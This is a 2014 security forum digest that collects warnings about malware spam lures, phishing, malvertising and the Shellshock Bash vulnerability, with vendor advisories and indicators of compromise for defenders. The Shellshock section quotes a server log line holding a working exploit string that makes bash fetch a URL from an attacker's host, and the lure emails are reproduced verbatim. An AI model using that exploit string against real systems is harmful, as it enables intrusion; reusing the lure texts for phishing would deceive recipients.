News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
October 01, 2014, 20:22:06
Pages: [1] 2 3 ... 10
 1 
 on: Today at 02:53:57 
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homicide-suspect-important-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
   From:     ALERT@ police .uk [ALERT@ police-uk .com]
    Date:     1 October 2014 08:49
    Subject:     Homicide Suspect - important
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: New York City Police
    Sending Location: NY - New York - New York City Police
    Bulletin Case#: 14-49627
    Bulletin Author: BARILLAS #1264
    Sending User #: 56521
    APBnet Version:
    The bulletin is a pdf file. To download please follow the link below ...


Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com  which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5e856b114844e8fadb5386403f9616c57b26562d5e1b78570a0525699474d738/analysis/1412150049/

** https://anubis.iseclab.org/?action=result&task_id=176a536785d2b80f411e27a2c10ba7dda&format=html
___

Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/something-evil-on-87118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."

87.118.127.230: https://www.virustotal.com/en/ip-address/87.118.127.230/information/
___

Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/uktservicescom-booking-cancellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
    From:     email@ uktservices .com
    Date:     1 October 2014 14:01
    Subject:     Booking Cancellation
    Hello.
    Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
    Here is a link to your updated bookings view...


All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."

37.235.56.121: https://www.virustotal.com/en/ip-address/37.235.56.121/information/
___

More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoice-08387-digital-fake-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/them_digital_email.png

There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today.  All have the same zip file name but the contents inside are named differently, Some will be caught by antivirus generic detections and some won’t, so be careful & watch out.  Use your eyes and intuition and don’t rely on yoiur antivirus to protect you from these types of malware
Todays Date: Them Digital Invoice 08387.pdf.zip: Extracts to:   ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/620ee072d3262102bd38c008fcf5a03ab44748d0f2cf6621079b768b1c7a89fc/analysis/1412153387/
___

Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbuild-copied-invoices-fake-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

get copies of invoices. We will not be able to pay them. Please send clear invoices

1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55* This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/80261645578f003d9961e1dd9438b27ee4bc14d27cf76bf8ab52db7f2f785961/analysis/1412156828/
___

GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 1 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___

DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/

** https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-hits-the-times-of-israel-newspaper/

*** https://www.virustotal.com/en/file/5378fdfdbbb87695d334c13b0b035d260a5934c071849ee000beec59c3ac7c26/analysis/1412048718/

 Evil or Very Mad  Sad

 2 
 on: Today at 02:21:45 
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

VMSA-2014-0010 - VMware product updates address critical Bash security vulns
- http://www.vmware.com/security/advisories/VMSA-2014-0010.html
2014-09-30
CVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
1. Summary: VMware product updates address Bash security vulnerabilities.
2. Relevant Releases (Affected products for which remediation is present):
vCenter Log Insight 2.0
3. Problem Description
a. Bash update for multiple products: Bash libraries have been updated in multiple products to resolve multiple critical security issues, also referred to as Shellshock...
I) ESXi and ESX Hypervisor: ESXi is not affected because ESXi uses the Ash shell (through busybox), which is not affected by the vulnerability reported for the Bash shell. ESX has an affected version of the Bash shell.
II) Windows-based products: Windows-based products, including all versions of vCenter Server running on Windows, are not affected.
III) VMware (virtual) appliances: VMware (virtual) appliances ship with an affected version of Bash.
See table 2 for remediation for appliances.
IV) Products that run on Linux, Android, OSX or iOS (excluding virtual appliances)
Products that run on Linux, Android, OSX or iOS (excluding virtual appliances) might use the Bash shell that is part of the operating system. If the operating system has a vulnerable version of Bash, the Bash security vulnerability might be exploited through the product. VMware recommends that customers contact their operating system vendor for a patch.
MITIGATIONS: VMware encourages restricting access to appliances through firewall rules and other network layer controls to only trusted IP addresses. This measure will greatly reduce any risk to these appliances...
References: http://kb.vmware.com/kb/2090740
(More detail at the vmware URLs above.)

- http://www.securitytracker.com/id/1030943
CVE Reference: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes ...
... vulnerability is being actively exploited...
... advisory is available at: http://www.vmware.com/security/advisories/VMSA-2014-0010.html
... archive entry is a follow-up to: http://www.securitytracker.com/id/1030890

 Exclamation Exclamation

 3 
 on: September 30, 2014, 02:49:19  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-natwest-you-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

    NatWest: "You have a new Secure Message"
    From:     NatWest [secure.message@ natwest .com]
    Date:     30 September 2014 09:58
    Subject:     You have a new Secure Message - file-3800
    You have received a encrypted message from NatWest Customer Support
    In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
    Please download your ecnrypted message at ...

 "You've received a new fax"
From:     Fax [fax@victimdomain .com]
Date:     30 September 2014 09:57
Subject:     You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...


The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1b09eaabd81bb0a64dc297e1d8fbbde5892e97e43c1fcec237d9f4a4eaf0c566/analysis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
69.89.22.130: https://www.virustotal.com/en/ip-address/69.89.22.130/information/
___

Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-air-thank-order-fake-word-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied  to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Order Notification,
    E-TICKET NUMBER / ET-98191471
    SEAT / 79F/ZONE 1
    DATE / TIME 2 OCTOBER, 2014, 11:15 PM
    ARRIVING / Berlin
    FORM OF PAYMENT / XXXXXX
    TOTAL PRICE / 214.61 GBP
    REF / OE.2368 ST / OK
    BAG / 3PC
    Your electronic ticket is attached to the letter as a scan document.
    You can print your ticket.
    Thank you for your attention.
    Delta Air Lines.


30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper  Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3761b84ab4ee6bded5fd2ed4717d84f73e749d733a2d8bb3765d62e0c4d9fd53/analysis/1412075964/

 Sad  Evil or Very Mad

 4 
 on: September 29, 2014, 15:15:16  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

OS X bash Updates ...
- http://support.apple.com/kb/HT6495
Sep 29, 2014 - Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: In certain configurations, a remote attacker may be able to execute arbitrary shell commands
Description: An issue existed in Bash's parsing of environment variables. This issue was addressed through improved environment variable parsing by better detecting the end of the function statement...

APPLE-SA-2014-09-29-1 OS X bash Update 1.0
- https://lists.apple.com/archives/security-announce/2014/Sep/msg00001.html
29 Sep 2014

OS X Lion
- http://support.apple.com/kb/DL1767
Sep 29, 2014
File Size: 3.5 MB

OS X Mountain Lion
- http://support.apple.com/kb/DL1768
Sep 29, 2014
File Size: 3.3 MB

OS X Mavericks
- http://support.apple.com/kb/DL1769
Sep 29, 2014
File Size: 3.3 MB

- http://arstechnica.com/apple/2014/09/apple-patches-shellshock-bash-bug-in-os-x-10-9-10-8-and-10-7/
Sept 29 2014

 Exclamation Exclamation

 5 
 on: September 29, 2014, 07:46:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-uk-remittance-advice-fake-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
   Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


Update: a slightly revised email coming out now but still the -same- malware attachment
   Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d8a6c8626cab8f4588254ce0d48460e9968ede774cc7c5b2b756ce4055e39d1d/analysis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-complete-office-solutions-fake-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
 Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a7ad4bf44b21ca85233b2eb8f708b196df4226db37406e74b6e791f6f05c75ea/analysis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-address/82.165.38.206/information/
UDP communications

137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malware-spam-lloyds-commercial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
   Lloyds Commercial Bank "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     29 September 2014 11:03
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

 HSBC Bank UK "Payment Advice Issued"
From:     HSBC Bank UK
Date:     29 September 2014 11:42
Subject:     Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...


The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/file/75da79cb6c1911e83500f603d3432a942ee200a17b97f10a9160142b2261e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-address/184.154.253.181/information/
81.88.48.71: https://www.virustotal.com/en/ip-address/81.88.48.71/information/
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
___

Fake Order SPAM
- http://myonlinesecurity.co.uk/order-statsus-order-confirmation-9618161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
 Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
 Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
 Kind regards,
Sales Department
Tiana Haggin ...


Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice  instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/23a77e612c3f1b44ab4c440354efe3e4867eacb20c53a06a449986f1186e715d/analysis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
23.62.99.24: https://www.virustotal.com/en/ip-address/23.62.99.24/information/
213.186.33.4: https://www.virustotal.com/en/ip-address/213.186.33.4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-voicemail-message-suy-301-fake-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
 The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.


... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c622342a2b88e89827f4f020d05c4a622c6768ead460bc1d0ec9ce36b3a4ecb/analysis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/09/your-mailbox-has-exceeded-the-storage-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
   “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”


The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/shellshock-command-diagram-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Table-01.jpg

89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
108.162.197.26: https://www.virustotal.com/en/ip-address/108.162.197.26/information/
162.253.66.76: https://www.virustotal.com/en/ip-address/162.253.66.76/information/
213.5.67.223: https://www.virustotal.com/en/ip-address/213.5.67.223/information/

 Evil or Very Mad  Sad

 6 
 on: September 28, 2014, 02:35:20  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
   dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/

83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___

Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223*
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues:
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."

 Evil or Very Mad  Sad

 7 
 on: September 27, 2014, 05:27:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Oracle - Security Alert CVE-2014-7169 released
- https://blogs.oracle.com/security/entry/security_alert_cve_2014_7169
Sep 26, 2014 - "Oracle just released Security Alert CVE-2014-7169*. Vulnerability CVE-2014-7169, previously known as CVE-2014-6271, affects GNU Bash, and if successfully exploited can result in providing a malicious attacker the ability to fully compromise a targeted system... Today’s Security Alert lists the products that Oracle has currently determined to be vulnerable to CVE-2014-7169. Download and installation instructions are provided for those products with available patches. Note that the fixes provided with this Security Alert address both vulnerabilities CVE-2014-7169 and CVE-2014-6271. The Security Alert Advisory will be updated to reflect the availability of fixes for additional products when they have successfully completed testing..."  
* http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html

- http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html#PIN
"Oracle has determined that following Oracle products are vulnerable to CVE-2014-7169 and CVE-2014-6271. Fixes for these products will be distributed as they become available and this Security Alert will be updated to reflect the availability of these fixes..."
2014-Sep-29 - Rev 4. Detailed product information moved to Bash Vulnerabilities - CVE-2014-7169*

* http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html
"... list of affected products and mitigation instructions as of September 29, 2014 at 02:12 PM Pacific..."

> https://linux.oracle.com/pls/apex/f?p=105:21:3597568493916265

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Sep 26, 2014

 Exclamation Exclamation

 8 
 on: September 26, 2014, 17:13:59  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Huge Update – 1789 Domains
- http://www.malwaredomains.com/?p=3663
September 25th, 2014 - "... -1789- domains were added two days ago. Sources: www.spamhaus.org, safebrowsing.google.com, osint.bambenekconsulting.com..."

 Exclamation

 9 
 on: September 26, 2014, 04:02:44  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you  to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

 Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...


